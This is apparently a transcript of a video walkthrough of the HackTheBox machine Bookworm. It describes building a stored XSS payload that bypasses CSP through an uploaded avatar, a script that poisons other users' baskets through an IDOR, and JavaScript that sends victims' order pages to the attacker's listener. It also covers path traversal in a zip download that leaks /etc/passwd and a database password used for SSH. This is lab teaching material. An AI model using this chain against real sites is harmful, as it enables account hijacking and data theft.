What's going on YouTube? This is IPSEC. I'm doing Bookworm from HackTheBox, which starts off with a insane cross-site scripting payload. But don't let that scare you away from this video. I think by the end of that portion, you'll appreciate JavaScript a lot more and learn a lot of things. Because when I did cross-site scripting in the past, I always used XML HTTP request in a quote-unquote incorrect way because it made sense to me. In this one, I had trouble using that just because my code was a mess. So I tried to use fetch. My code became a mess. So I tried to use fetch with await statements and async, and I couldn't keep track of my variable names. So I started creating helper functions, and by the end of the day, I became pretty good at doing this type of exploitation, and I think you will be too if you watch it. After that, the box does get a little bit easier. The next step is abusing a symlink to exploit something, but really, let's just get into it because this is going to be a fun one. As always, we're going to start off with an nmap. So -sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it Bookworm, then the IP address of 10.10.11.215. This can take some time to run, so I've already ran it. Looking at the results, we have just two ports open, the first one being SSH on port 22, and its banner tells us it's an Ubuntu server. We also have HTTP on port 80, its banner tells us it's Nginx, also running on Ubuntu, and also redirecting everything to bookworm.htb. So let's go ahead and add this to our host file. So sudo v etc host, and then we can add 10.10.11.215 bookworm.htb and check out the page. So let's go http bookworm.htb. We probably want to turn burp suite's intercept off. Let's go over here, proxy, intercept, there we go. And it looks like we have a online bookstore. So I'm going to check out the shop. And looking at this, it looks like there are a bunch of books. We can try to view a book. And if we add it to our basket, which I guess is the same as a cart, it wants us to log in. And at this point, I'm going to turn intercept back on. And I just want to intercept the response to something. So I'm going to try admin first. So we'll do admin. But the main thing I'm looking for is the headers. So we can see X powered by Express. So we know this is Node.js. Let's just forward this request, and it just says invalid username or password. So let's go ahead and add an account. And since this is Express, I would probably try for no SQL injection as well on the login form, just because the mean stack is so common. I want to say mean stands for Mongo, Express, Angular, and Node, but I could be wrong there. So let's just put a bunch of junk. I'm doing username and name as IPSEC, password as password, and then 1, 2, 3 in every other field. So it let us create the account. We can log in with IPSEC and password, and now we're going to be able to test our cart. And we can also see this recent update thing. It does work. We can see Joe Bubbler added the yachting party to their basket. So if we add this, we can see we also added something to the basket. So since we have a thing right here, I definitely want to check for cross-site scripting. So I'm going to do a U. So this is going to underline my name if it exists, right? I was going to do bold, but it looked like my name was already bolded in that. So there we go. I put a U IPSEC, and we see the actual HTML. So this is not going to be any cross-site scripting. If we attempt to view the book, let's add it to the basket. Go over to a basket and see what else there is. There is a note here saying, as a result, we're no longer offering free ebook downloads of purchased books. Don't fret. All previous orders that were made during our moving period will still be downloadable. We hope you enjoyed the new 4-hour guarantee. So what this tells me is we have users. We know there's some type of simulation going because we see a user adding stuff to the basket. We also see there is a download functionality. However, it's only on old orders. So this is telling me somehow we have to get to a existing user's profile, examine the previous orders, and see if we can find out how to download ebooks, because when there's a file download, maybe there's a file disclosure vulnerability. that is just a super good guess at this point, right? So let's try editing a note of this. So the note, let's intercept when we add this. Let's just do test. So it just gets added there. And if I looked at that, I should have taken a more second. We can see it adds to basket, the basket ID, which is 359 in this case. I'm guessing this is just an incremental number, and then edit. And it adds quantity and then the note. So now if I click this again, we have the note here. So let's try doing some JavaScript here. So we'll do script alert 1/script. And then we can update the note. I think my burp suite, okay, it is no longer on intercept. So we now have JavaScript. It doesn't look like it's loading on this page, even if I refresh. Let's press F2, or was it F12? And it did not load, but there is a warning here. It says this page's settings are blocked the loading of a resource inline, script source. So it means we can't load any JavaScript off the existing page. We see it again, it's blocked. So I think that means our JavaScript did run. However, well, it did exist, but because content security policy was blocking it on itself, it did not run. If I go to the source, let's see, we can see it is here. And there is no like HTML ND encoding around the special characters. So this definitely is somewhat vulnerable. We just can't execute it on itself. So what that means is we have to find a way to create like XSS somewhere else. We could probably try it on our own box. Let's see. Let's look at it. We have content security policy here. Let's try that. So I'm going to do NC-LVNP 8000, and let's just see if we can make it call back to us. So I'm going to redo this whole process of adding a book to a basket. Then we're going to do a new cross-site scripting payload. So we can edit note. We can say script source is equal to HTTP 10.10.14.8 port 8000 loaded, I guess, or we'll do pwn. Doesn't really matter what the file name is. And then we can do /script, update the note, complete the checkout. And let's see. It does not look like it loaded off a different website. It says loading failed. Script with source HTTP 10.10.14.8/pwn. So I'm not sure exactly what is stopping this. It's probably some type of browser type security. So we can't load it off an external resource. Let's just keep poking at the website. So I'm going to go to, let's shop, see if there's anything else we can edit. Does not look like it. We can click his book and it just brings us to the book. We do have a avatar. So let's try updating our avatar and see if we can put a file there. So I'm going to locate every file that ends in JPEG. And then we're just going to copy a random one here. Actually, we probably don't need to do that. Let's just touch or echo, please subscribe to test.jpg. Whoops. To test.jpg. So let's browse HTTP. And then we want Bookworm. Test. Go over to browser. I am going to intercept this request. So we can see the MIME type is image JPEG, so it is uploading as it. I'm going to try just uploading this. It's redirected us, which I think is good. Let's see. Let's turn intercept off. And then we got to figure out how to load our profile. We have a broken link where the profile was. So if I open image in new tab, it goes to download. So let's just curl this, and we can see we can write a file. The whole reason I'm not trying to use like a PHP web shell is because this is an Express website, right? It's very hard to just get code execution there. If this was in debug mode, it would be potential to be like overwrite a JS file and get it to reload. So we can also test for directory traversal. So let's see if we uploaded something to image. We did not. So I don't think it is vulnerable to directory traversal. The other reason I'm not trying that much is because we don't have control over the file name. We uploaded test.jpg and it uploaded as 14. So either that's our user ID or maybe that's just the 14th avatar. That could be an incremental number. So that's why I'm not trying a bunch of just directory traversal type of attacks, because again, we also don't control the file name. But we could insert JavaScript here. So we can do script. We don't want to do that. We just want to do alert 1. Okay. So now when I go here, we have alert 1. So what I want to do is edit my basket to have that JavaScript to load that. So let's go back to the shop, go to view book. We have a different user there. Go to add basket, add this. And then what I want to do is say script source is equal to, and I'm going to grab the /static image uploads 14. And then we can end the script, update the note. I clicked edit again, didn't I? Update it. And then when I click complete checkout, we have a JavaScript or alert box. So we know this is going to be cross-site scriptable. The thing we have to figure out is there an IDOR vulnerability in the basket itself? Because this doesn't really do us any good if we can't poison other people's items. So the easiest way to test this is just to create another account and have another browser. So I'm going to go back to bookworm.htb on a different browser. We can log in. We're going to create a new user. I'm just going to say this is the victim. Same password of password and junk everywhere else. So we can do victim, password. Then I want to, let's see, I'm going to go to view book. We can add it to the basket. If I go to shop here, we can see the victim added it. But the issue right now is we don't have the basket ID. We could try adding one to ourselves and then we'd see like when we edit it and just know we go up one. But I'm going to look in the source to see if there is any indication. Maybe like the link is added, but we do have a comment here. So 369. This probably means basket ID 369 because we have 367 down here. I'm guessing I was 368. I don't know where 368 is, but I'm guessing that was me. And then I checked out and it disappeared from this list. That's the best I can guess right now. So we have 369. So let's go add something to our basket. It'll probably be basket 370, right? And we want to edit the note, go over to burp, intercept. And then we're going to do the same thing. Script source is equal to our JavaScript payload. We are intercepting, so click update note. We're going to send this to repeater. And what basket ID was it? I think we said 369 because this is 370. So let's just try 36. Whoops. Okay. Numlock was not on. I started hitting 369 and it did not do what I expected to. So I'm going to edit this and we can drop this packet, I guess. So if I go to my basket here, click edit note, we do have the JavaScript. If I go to, whoops, cannot get. If we go here, we have it as well. I thought I dropped this request, but I guess maybe I did not. Oh, okay. I just had to do a Control-Shift-R to refresh it. So we don't have the basket here because we never sent it to 370. So there is an IDOR vulnerability. So if we completed this checkout, we have the JavaScript. So we have a way to now infect other users' baskets. The issue is we're going to have to build a pretty complex cross-site scripting payload to do this, because we want to hit probably the profile page, then look at the order history, and then grab all these links and click through them because we want to get each of these pages. The reason why we want to get each of these pages is we want to see if there's a download link on any of them, because that would give us a new endpoint to hit on this web application. So I'm trying to think what we want to do. Do we want to start with cross-site scripting or start with a Python application to poison baskets? I think a Python application would be the best place to start right now. So I'm going to do touch. We'll call it basket poison.py, I guess. And we're going to want to have a script that essentially will crawl or hit this shop URL, and it will look for any new basket it finds. And it knows the basket ID because there is a comment. There we go. We have 371. So we want to look for this text. And when we have a new number, then we know we can poison this basket. So let's start this Python script. So let's go to Visual Studio, go to basket poison. And the first thing we're going to want to do is import request, because of course we have to make a Python request. And I'm going to do something a little bit odd because in Python, I don't really know how to pass pointers, and like there's a bunch of just magic goes on with variables to me. I want to explain it real quick, and hopefully this makes sense. So what I want to do is have a Python session. So we can say session is equal to request.session. And I want to do this so I can log in. So we can say session dot, was it? Probably post. And let's just pretend this is login. It's not going to work because maybe that would. No, localhost 5000, definitely not. We'd have to put like bookworm.htb. I'm guessing the endpoint is that, and probably username of IPsec and password of password. I'm guessing that works. So then I'd want to create different functions to do things. So I'd want to do like define get latest bucket and have like pass in the session. But I don't like returning session every time, right? If I was in C or Golang, or probably a lot of other languages, I would pass in the session as a pointer, and then when we call the function, we do it. So we just pass the pointer in so it updates. We don't have to worry about a return. So whenever I want to do something like that, where I just want to update a variable without returning the variable exactly, I always use classes in Python. Maybe my whole explanation just confused you more. Let's not call this exploit. Let's call this Basket Poisoner. So we can create variables on this object. So I'm going to say self. We're going to give it a base URL. And then we set it up like that. So now we can just create this object. So I'm trying to think of what I want to call this. I know this is probably a bad name. I'm going to call it ses for session, but it probably shouldn't be that. And I'm going to put the URL up here so we have it as a variable. I'm going to say this. Okay. And then we want to create a function here. Let's call it login, self username password. And that looks good. Okay, so we can say ses.login, IPsec, password. There we go. And now if I do ses dot session get URL plus shop. And we can say r is equal to this, then print r.text. So let's just see if this works. Yeah, that should be fine. So I'm going to do Python 3, and we called it Backet Poisoner. We have this. I want to make sure IPsec is on this page. Let's just search up for IPsec. Okay, so /profile is pointing us to IPsec, so we know we logged in. So we have a working thing. Instead of sesh, I'll call this BP, or we'll call it, yeah, we'll do BP for Backet Poisoner. That ses.session is confusing me. So there we go. Now what we want to do is be able to get the latest bucket. So I'm going to call another function. We can say get latest bucket. And we're going to loop this because there's a chance when we hit the page, there are no requests in the shop, right? So when we don't have that, I'm just going to have it sleep and retry. So we'll say session get, that looks fine. And we don't want to go in the cookies. That is Copilot doing things we don't want to. We're going to use a regular expression. So I'm going to call, I keep saying bucket. It's basket, right? There we go. So we can say basket is equal to regular expression find all. And we want to import RE. Okay. And we want to create a regular expression to find this. So that was a comment. So we'll do this. And then we want to grab all digits. So we can do that like this. We'll put this in a parenthesis. And I think that should be fine. Oh, we have to say r.text, the actual HTML. And then we can say if the length of basket is greater than 0, we can return basket 0. So return the first match. And otherwise, we can say basket not found, sleeping 5 seconds. And we can do time.sleep. And then we also have to say import time. Okay, so let's say basket is equal to this. And then print basket. So if I run the script now, let's see what happens. We get 377. That is awesome. So we already have it grabbing the latest basket. If I just refresh this page, it'll probably have 377 right at the top. So it looks like this is working. The next thing we have to do is poison the basket. So I'm going to do, it's almost like it heard me. So we're going to call poison basket. And let's see. The code it's giving me is not good here. So we want to say the URL is going to be the base URL. And then what was it? It was like edit, right? So let's go back to Burp Suite, intercept. We have basket 369 edit. So I'll just make this a F string, and we can say basket ID, edit. There we go. The data we want to poison with is going to be this. So we can copy this. And let's see. We'll just paste. We can say quantity 1, note. I'll do this in a single quote because we already have a double quote in our XSS payload, right? So we have the URL and data. That looks good. And let's see. That should be fine. So what we have to do here is identify if we have a new basket. So I'm going to do another infinite loop. So we'll do while true, and then we're going to say new basket is equal to this. And then we'll say if new basket does not equal basket, then we found a new basket. We will want to poison it. And, oh, I already hard-coded the payload. That would be fine. So we will poison it and then set new basket equal to, or set basket equal to new basket, and we'll go back through this loop. So if it attempts to run again and it's not a new basket, then we won't poison it because we won't hit this. Okay. We probably want to say poison basket, and then we can say which basket we poisoned. That should be fine. I'm just going to do new basket so we stay good. Or maybe we should put that in here. We probably should do some type of like try catch statement around this. So like to do try catch to verify it's poisoned. But I'm not going to do any of that type of error handling in the script. So let's see. What else do we have? We did this. So I guess the next thing we just want to do is sleep. So we'll do time sleep for 2 seconds. So let's see what happens when we run this. So when we run it, we don't have anything. It's sleeping. How long do we sleep? 5 seconds. So I'm guessing it did not have anything. I bet if we refresh this page, look for this payload, we have 380. So I guess if we added another thing to this, when it gets to 381, that's when we see output, right? So I'm just going to do it myself. We'll view book, add to basket. We go here, go back to our payload, and we have a error. Missing schema, invalid URL. Let's check this out. Which line is this? It's probably the poisoner, right? Let's see. Line 40. Poison basket. Poison URL. Oh, we need to do self.base URL. There we go. Rerun this. And let's see. Let's add something else to a basket. View book. That's going to be the same thing because we already have that in our basket. We'll do the little mixer this time. Add to basket. Okay. If we go here, we poison basket 383. I'm going to guess that is this. If we edit the note here, we already have the payload. So if I completed the checkout, we have the cross-site scripting thing. So now we have to build the XSS payload because we have the poisoner working. So I'm going to create a new file. We'll call this payload.js. And this part is not going to be fun, but at least it's going to be epic. And we're going to spend a little bit more time showing like a payload evolve instead of just going straight away to do it the way I think is elegant. And it should be mentioned that I think this box was blooded in like an hour. This piece of the box took me probably the better part of a day. And I'm saying like 6 to 7 hours, mainly because I hate JavaScript, but I started learning a lot about JavaScript doing this box. We want to use the fetch, and this is going to download a page. And we're going to do it a somewhat bad way, but the way I see most guides doing it online. So we want to fetch profile, and then we'll say the mode is going to be, we want to disable cores. We want to, include credentials. So if we do include credentials, it's going to include our session cookie with this request. The actual cookie is HTTP only, so we can't steal the cookie. So we have to use JavaScript to control their browser. So we'll do cache is equal to no store, and we want to close that. So if we do this, we have to create all these nasty thens. And because it's async in the fetch module, we have to grab the text like this. And then we do another then. We can grab the response text. And then we can do something else. So what we want to do is, I'll just print it now. We'll do console log response text. And we'll get to make several requests. So if we did that, this payload is just going to get massive. Is it like that? There we go. Let's try this. So if you want to test it, the best way is just your console window, right? Developer tools. So this does work. But again, I think this, if you imagine, we're going to have to probably get 3 URLs by the end of the day. So you can have so many thens. It's just going to get crazy and unmanageable, right? So I evolved, or I started using async with my fetch. So we could do a const. We'll say profile is equal to await fetch. And what await does when you call something that's async, it's going to wait for it to finish. That's why we have to use these thens, because we don't have an await call. So we have to wait for this to finish. Then we can get response text. Then we go here. Then we can do something. If we didn't do that, then all the ordering would go out of whack, and it just would not work. It's hard to explain other than it won't work, or it didn't work for me. So we can do that. And then we also have to grab the text for it. So we can do await profile.text. And then we can just do console log. So this also works, right? So if I do this, we can do it and we get the profile. This gets a little bit messy because I hate having to do 2 variables every time I want to pull a page. So because of that, I used a function. So we can then create a async function, then get page, and we pass it the URL. And let's see, I'm just going to copy this. Okay. So we can fetch URL. I'm going to call this request. We'll call this response, and we can return response. So I can just do now profile, let's just call it profile, is equal to await get page / profile. And we do this, and we can copy this entire function over here. And body has already, let's refresh it. We get our JavaScript. Profile is not defined. Oh, we have to call const profile. There we go. We could have probably also used let or something, but whoops. Let's copy. And we have to specify the URL, HTTP. Let's put that in this. We'll say HTTP bookworm.htb plus URL. There we go. We'll call this page. You can replace URL with page. There we go. I'm just going to go to the shop page so I don't trigger my XSS again. We send this. Profile is undefined. Oh, it's request. Redirect. Oh my God. This is going to be more painful than I thought. Okay. It was just because I did not refresh, so I had a variable. but now we can get this. So what we want to do is grab all the orders on our profile because we want to get those pages. So what we can do here is instead of just logging the profile, we can say const, we'll call this, I'll just do RE for regex. So RE orders is equal to, what is it? We want to get order, then a digit plus, we want to get all of them. And I'm going to put it in parentheses. So now what we want to do is test if it is on this page. And regular expressions in JavaScript is weird, or maybe I do it a bad way. So we're going to test profile. Okay. And let's see, we want to say while, and we're going to call this order IDs is equal to RE orders dot exec profile null, like that. What are you erroring on? Okay, it's not. So let's just do console.log order IDs. And if we do 0, it's going to show us the full string. If we do 1, it's going to show us just the order ID. So let's prove this real quick. Paste this. Get page is not defined because I did not copy everything. Paste this. It did not work. Let's see. What's profile? We have that. Okay. Paste this. Oh, we have order ID 139. Okay. So we have order ID 139. We only have one. I'm going to complete another order so we have multiple orders. I want to make sure that's working. Add to basket. Complete checkout. Yeah, we have that XSS. Oh, we did have multiple order IDs. We have 130, 131, 133. So we're screwing something up here. Let's see. Go here, paste this. We have an undefined. I don't know why it's undefined. We awaited there. We have that. We test. I think I have an error somewhere. Okay, it's pulling everything. So I think things are working. It's weird that I have to call this separately, which leads me to believe we have some type of async IO bug. Because I think it's testing the profile before this finishes, which doesn't make sense because we did await it. So do I have to put a semicolon here? I doubt that. I didn't do a semicolon there. Is this the problem? Do we have to do... Maybe that's it. Undefined. Weird. If we type profile, it definitely exists. So we'll continue and debug it if it doesn't work at the end. So we have all the order. So what we want to do is get the page here. So, oh, we could also show, let's see. So if we just copy this, we have all the order IDs. We could say order IDs 1. And if we do this same while loop, it's only going to print the numbers. So let's see. We can say order URL is equal to order IDs 0, and then let order ID is equal to 1. Console log. I just want to make sure the let is working here. Order URL, order ID. Okay, so that works. So now let's download all those pages. So I'm going to say const order equals await get page / order, and then we want the order ID, I believe, right? Is that where it's linking us to? If we go to our profile, view order, order 130. So that's what we want. So we have this, and what we want to do with this is eventually send it to us. So let's do a new function, and I'm going to say, we'll call it post data, I guess. Try and bait. This is really exfil, I guess. We'll say exfil data. Or now we'll just do post. Post data, and this will be URL. To make it easy on replacing who we send it to, if like my IP ever changed. So we do this request. We have a fetch. This is going to us. This is going to go to our IP, so we don't need to send credentials. We will have to change the method to a post. And then we want to say the body is going to be the data. Okay. So we do await fetch. I guess we don't need the response. We can just return. I think that'll be fine. Okay. So let's now say await post data HTTP 10.10.14.8 port 8000, and we're going to give it the order. And I'm going to say order ID. Okay, so I think we're going to send data now. So if I copy this and we listen on port 8000, then we go back to our browser, F12, we have to copy everything. I really don't like that I'm having to do this separate. Await is only async. Generate. What line is that? We did await get page. Await post data. Do I not await there? Uncaught syntax. Eval code 622. We can get rid of this. 22. It's going at the end of this. I honestly don't know how to debug this. We have a profile? We do. We can test the profile with a regular expression. True. So we go into this loop. Order ID is not defined. Let's see, while null. Async. Do we have to return request? Let's just do what we did here. We'll do response and return like that. Await. I'm really curious. Why? Because we have async function, post data. I may pause the video and play with this because I am getting confused. So if we don't do that, does this now error? Is it this code? That doesn't look right. It is that. Const order await get page. We called get page here. Nothing hit us. If I put this in my loop, we're just going to get our profile constantly, which is fine. Because we're redeclaring it. Let's do order. Huh. Doesn't like us using await in this loop. Let's move this, I guess, async function. We'll call it poison. And we'll move this entire thing into this. And then we can call poison. We'll uncomment this. And we'll just paste everything here. Get page is not defined because I did not copy it. Promise pending. We did not hit. Something really odd is going on. We only use order ID once, so I didn't reuse that. This isn't Go, so just because I declared this and didn't use it, that still should be fine. I'm going to put these as constants. I really don't think that's it, but maybe it is. Promise pending. So one URL is not coming back. But we're not getting a hit here, so it's not getting to my post data. We don't even have that. Proxy is off, but let's turn it on. Poison. I should see something in Burp Suite. I do. We got the profile. Then we're going to get a order ID. Get another order ID, and done. Fulfilled. Okay. So I think it's working when we put it in the function. I'm stupidly not doing a log, and we're not sending the data. So const, we will say, we'll just do await, post data. We'll try this again. 10, 10, 14, 8, 8,000, then plus order ID, order. Spell await correctly. I can just do Control A. Intercept is off. Promise is pending. Oh, pending because we sent it. Awesome. So now it's working. I think moving this to a function somehow helped. I'm not positive, but we're just going to go with that explanation. So now we have the post data. So we get a response to us. So the next step is we want to download everything. So I'm going to create, we'll call it server.py. And I'm going to do from Flask import Flask request. And we can say app is equal to Flask name, app route. And we're going to create a order. Then we'll say ID, like that. I wonder if does it want me to do it this way? We can try this. That's probably more secure, so it gets defined as a integer, right? So we can do methods is equal to post. Like that. I'm missing something. No, I'm not. So we can do def. And what we want to do is save this file. So I'll do with open f orders, then ID dot, we'll call it HTML. And we'll write it as a file. We'll write the request. It's not a form. We'll just do request.data.decode. And then return OK. Okay. And we can say app.run host is equal to all IPs. Port is equal to 8000. Okay. Go into code. Let's do Python 3 server.py. And then I'm going to copy my payload. It's this one. Go back to our browser. Paste. We're sending it, and we're getting 404s because we just said the order ID after the URL. So what I want to do is edit my payload and say order slash. Internal server error. Because we don't have a directory orders. Run it. And we have saved a few requests. Or at least I assume we saved. Let's go cd code orders. And then if we last 131.html, we can see this is our order. So what we want to do now is update the our avatar, which is where we're poisoning buckets to be this payload. So let's copy this entire thing, go back to Burp Suite, go to repeater. This is our profile avatar, but we just have the alert 1. I'm going to put this entire JavaScript. So we're going to send this. So now if I went to one of my pages, so let's save this. I'm going to, let's clear the screen. Let's just go to my profile. I'm going to go to an order. I'm assuming I poisoned this order. And our browser sent us all this data. So what I want to do is just wait probably 5 minutes because we're going to have users that we assume because of the activity feed here or shopping. We can see we poisoned 2 baskets. That's probably these 2. If I control U like this, let's see, uploads 4. So this is that user. If it was us, then we'd see, was it 14? Was that our bucket ID? Profile avatar. I'm pretty sure we were 14. I don't think I have it here, but I think we were 14. So we know we poisoned this guy's bucket. So what we want to do is wait for him to check out, which it'll probably take about 5 minutes. We have 409 there. Let's see. I think I want to put the timestamp here, because I'm going to pause the video and speed up. right? So I want you to see how long this can take, because this is one of the more painful parts is waiting here. So let's see. Where do we print? I'm going to disable this so it doesn't flood the screen. And then let's see. Get current time. Now, okay. Let's make this an F string. Now, poisoned basket, new basket. There we go. Rerun this. So hopefully it is a bit more verbose when we do times. So we'll add this. Added. That is not what I want. Let's see. Oh, we sent a bunch of orders. So maybe I don't have to pause the video. Let's just look at the orders we have. So I'm going to go to orders, or it was code orders. We can either less it. If we less 11.html, we can see at the very bottom, we have 2 links. And this is going to be one of the hard parts. There is a file disclosure vulnerability, but it's when you send multiple book IDs. It's only in the download everything. And I'll go over it in a couple minutes on why this is. But instead of just blindly trying this one and failing, I figured I'm just going to go quickly and we'll only do this one. So we want to be able to download everything. I'm going to put a file in the second book IDs. So typically, whenever you can download something, I always try putting a file. So we're going to try that. But first, we have to grab this URL. So we're going to go back to our payload. Before I do that, I'm going to grep book IDs on 11.html. And it looks like if I make a regex that just grabs digit question mark book IDs and then this and, it'll only grab the download everything link. And then I'm going to fill out the second book IDs with an etsy passwd. That makes most sense. And if you wanted to, you could also Firefox 11 HTML and open it up to see kind of what it looks like. So let's go back to our payload. And what we want to do, we can send the data. But after we send the data, we want to do a second regular expression. So I'm going to do const regex, or we'll do re. And what is it I want? We'll call this download everything is equal to, and then we want to what? Start with a digit. So we'll do \d plus, and then we want to escape a slash. Do we do this in quotes? No. So we escape the slash. Then we can do, wait. We did 11. Oh, we escape a question mark. That's what I want to do. Then we can say book IDs is equal to another digit. And then we want to do ampersand, like that. What did this say? This is a bit of hack, but it works. How did it know that's a good comment for this line? That was one of the better things I've seen Copilot do. I'm going to leave that. That is fun. So we want to test if this regular expression works. And then if download everything is there, we will want to get the data. So we can say download everything is equal to re download everything exec on the order, and we want to grab the first item. So the order, this is going to be the HTML page. So that is 11.html, right? That's this. So we're looking for download everything. So we have that link. So we want to download it. So we can say const download is equal to await get page. And then we say download plus download everything plus, and if we go back here, we start at this and. So I'm going to do book IDs is equal. And we're going to do a bunch of dot slashes, Etsy, passwd. I think that is good. I'm hoping it is. And I'm going to do one slight thing. I'm going to call this get page binary. And we're going to create a new function called get page binary, which is going to be the same thing, except instead of returning text, we return blob. Because we're dealing with the file, not ASCII text, I want to make sure we treat it the correct way. If you don't, I think like your zip's going to die in the middle, or it will have extra data because it encoded something it shouldn't have, and just all like hell will break loose. So make sure when you download things, you use the blob. And then we want to post data to 10, 10, 14, 8, 8000. And then I'll do exfil plus order ID download. We are missing something. I did not end a quote probably here. There we go. And I think that is going to do it. I don't know what this complaining about this semicolon. We're missing a bracket. There we go. So what I'm going to do is paste this into our payload, because again, this can take 5 minutes. And if I see a 404 on this, I know it works. But let's now go back to server.py, and we want to create a route for exfil. So we can say app route, we'll do exfil, method post. We got to change this. So we'll do exfil ID. We'll make the directory exfil. I don't know the type of data it is. We'll just call it dot. We won't even do that. We'll just do order ID. And then we are decoding the data. Again, we're probably dealing with binary data. So we're going to write binary. And we're just going to do request.data. And I think that should work. If I make dir, we gotta go up one. So we make dir exfil. We run the server, and I think we are good. It's kind of hard for us to test this though, right? Let's see. CD orders. So the best way, I think, to test it, let's do Python 3-m HTTP server 8001. And I think it's going to work, but we're waiting on time, right? And you can't hack time. So while we wait, we might as well be productive. And I'm going to test out our actual payload. So if we go back to this payload.js, we really want to just get this page. We want to probably, oh man, I hate that I defined this. Let's see. I'm just going to copy, paste, rename, debug, get page 10, 10, 14, 8, 8000. Okay, so let's put this in my terminal. So now that get page is defined to point towards us, we can now get 11.html on 8001. And I called it 8000. It's really 8001. There we go. Okay. Go back here. We can edit that. We're not using those now. So what we want is to redo order. So we'll do const order is equal to 11.html. We have to do slash. Let's see, read because we made it constant. I'll call it debug, I guess. If I do debug, we are nothing. We got it. Is debug a protected value? IPsec. No. We're still just posting orders there. And so we see 2, 3, 151. I'm guessing we have something broken because we did not get the post request on Exfil. So something is broke. I don't know what though. I wonder if this is some type of course thing. If I do 10.10.14.8, port 8001, if we start off on this page, F12, get page, we defined it. Where we are on this tab. There we go. So now we have it. We have a downloads everything link. What do we call it? Debug. So we want to define this regular expression. I see the error. We have 4. It's D. That's probably it. I really should not be in the habit of calling everything constant. Everything will be with the /D. Then we can test this. .test on debug. It is true, so we matched it. That is good. We got to change this back to everything. And it's no longer order, it is debug. We have 11 question mark books ID. That looks good. So the next thing I want to do is print this line. Console.log. And that looks good. So I think once we fix that, it's all good. Let's go back to our payload. Let's put a D there. Copy everything. We have to go to Burp Suite, repoison it. Go back here. And I'm just going to, let's see, Python print human timestamp. I forget how to format that. Import time, date time. Maybe that'll be good. POSIX. I'm going to try this real quick. not how I remember doing it in the past, but it may work. So we can say timestamp is equal to this. Now import date time. There we go. Do this. Bookworm. View book. Add to basket. There we go. We have somewhat of a good timestamp. So with that being said, I'm going to pause the video and we're going to wait probably about 5 minutes. So let's see, sleep 300. I'll come back when this sleep is done and we'll see how many requests have been made and if we have any actual exfil data. We have not hit the 5 minutes yet. It was probably, I would say 1 to 2. And we see some exfils, right? We have exfil 11. So I'm going to check that out. So if we go into our code directory, go into exfil, do a file on 11, it is a zip archive. So we can do 7zl11, and we see it's got 2 files. We got the pirate woman and unknown. So let's extract 11 and look at unknown.pdf. And we have the passwd off the server. So I'm going to move unknown to be called passwd. We can remove star.pdf. We don't need that one. And let's see, make dir. We'll go up to directories and say exfilled. I don't know what to call this. So there we go. I want to save every file we download. And we're going to delete that. And we want now to get a different file. And this also is going to be a bit like Nostradamus of me just knowing the file I want to grab. It is a node thing, right? So there's only like a few files we'd really want. We could go, well, the files we probably want are, let's see, index.js, database.js, app.js, or something like that, right? We want to go into those. So I'm going to try proc self current working directory, and I'll do database.js. I would probably start with index and app, but I don't want to wait all that time, right? So we'll start with those files, and I think all we have to do is add that. So if I now come up, paste the payload. Okay. We shouldn't even have to update anything. It all should just automatically work because we didn't change the Backet Poisoner. That just sends them the avatar URL. This part didn't change. The only part that changed was the avatar URL, and we just uploaded that, right? So I think that's going to work. I'm trying to remember exactly how I did it. I saw this box yesterday and I'm just like recreating all the steps I took. But I want to say that's how I did it. So let's just sleep for 5 minutes and hopefully I have some type of data in exfil. So I'm going to pause the video now, probably be back before 5 minutes. But if not, then that's when I know I need to start debugging because in reality, it should not take longer than 5 minutes to get the data. It's been probably about 30 seconds since I stopped recording, and we did get an exfil. I probably should fix this condition where we just do it multiple times. There's no reason for us to send the file 3 times or do this 3 times. I don't know where that bug is, but I don't know if I want to fix it because it seems to be working now, right? So we exfilled 14. If we do a file on 14, it's a zip. So let's unzip 14. We could have also done 7zl. There's really not much different, right? Let's look at unknown.pdf, and we got a file, right? We have the user bookworm, database bookworm, password Frank, the job giver. So if we SSH bookworm at bookworm.htb, put in Frank the job giver. Womp womp. We don't log in, right? But we do have the passwd file. So I'm just going to move this over to Exfilling, and we can call this, what was it? Database.py or .js. So let's look at passwd, and there is a Frank user. If we wanted to, we could just grab everything that ends in sh. So we have root, Frank, Neil, James. Since Frank is in the password, I'm going to try to SSH as Frank. And I may also like do crackmap exec with a bunch of usernames and spray it. If I had more than 4, I would probably go that route. But I like just taking a guess first. And we log in as Frank, and user.text is right there. What's going on? This is it from the future. And before we go enumerating the box as Frank, I want to take a step back and talk about something that I found interesting. If we look at the orders and go to like order 11, I had mentioned that only this one was vulnerable, the download everything that has 2 book IDs. If you tried the one with just 1 book ID, it wasn't vulnerable. And the reason why I found is pretty interesting. It's one of the things that Node does pretty well on standard things. And when you do multiple books, you're doing a zip. So I wouldn't really call that exactly standard how that works. But let's look at the code. I'm already there. We're defining book IDs. We're just saying it's going to be request.query. And then we say if the book IDs is a string, we go down here. So this is the single path, right? We're going to do a res.download, book IDs, file name. We're going to give it the path, right? Well, if you look at the zip, it's very similar, right? We have the zip, we have the book IDs, we're getting the file name, and we need the file name here mainly because it's a zip file. What do we put in it? And then we have like the path.join command here that looks very similar to this path.join, but it's extremely different because this one has root. This res.download supports this, which kind of like jails it to that directory or makes a ch root. I don't know a good way to explain it, but you can't go outside of the directory. So this is what's preventing the LFI on the single book ID. Is this makes it so we can't go out of the working directory /books. It is pretty cool. So let's take a look at it. I had created a simple application, and by created, I asked ChatGPT, give me a boilerplate, and I finished it off, right? So we have 2 post parameters. We have no root and with root. And on the no root, I'm just doing file is equal to rec.body.filename, and then we're going to download the file. With root, what we're going to do is assign the file name just like we did before, but this time we jail it to the dir name, right? So let's go play with this. If I do Python, or not Python 3, wow, node index.js, we're going to stand up our web server, and then I'm going to do a curl localhost port 3000. Let's start with no root, and we'll specify the post parameter file name, and I'm going to give it please subscribe because I do have please subscribe. If we go in app web, there is a please subscribe in this directory. We have it right here. And then I put one up one directory, right? So with the no root, we should be able to read both of them. So if we do please subscribe.text, no such file or directory. Does it help if I can type correctly? I'm guessing that was the problem because it's just please sub. We get no really, please subscribe to me, right? So let's try doing the directory traversal. Again, there is no root specified in this, so I'm hoping it works, right? Yeah, it says thank you for subscribing. Awesome. So what happens if we specify the root parameter, right? So this is the one that specifies we shouldn't be able to leave this directory. So if we do please sub.text, cannot post to, oh, we called it with root. We get that message, And then if we go ... we get an error message. And this is a 500 message. I want to say it's 500. Let's do a -v so we can see. 403 forbidden, not 500. But it's just giving us the error that we can't get out of that, right? I don't know exactly what that says. I wonder if we can decode this quickly. Let's go copy, burp suite, decoder, paste, smart decode. Ooh, we're getting there. Vim 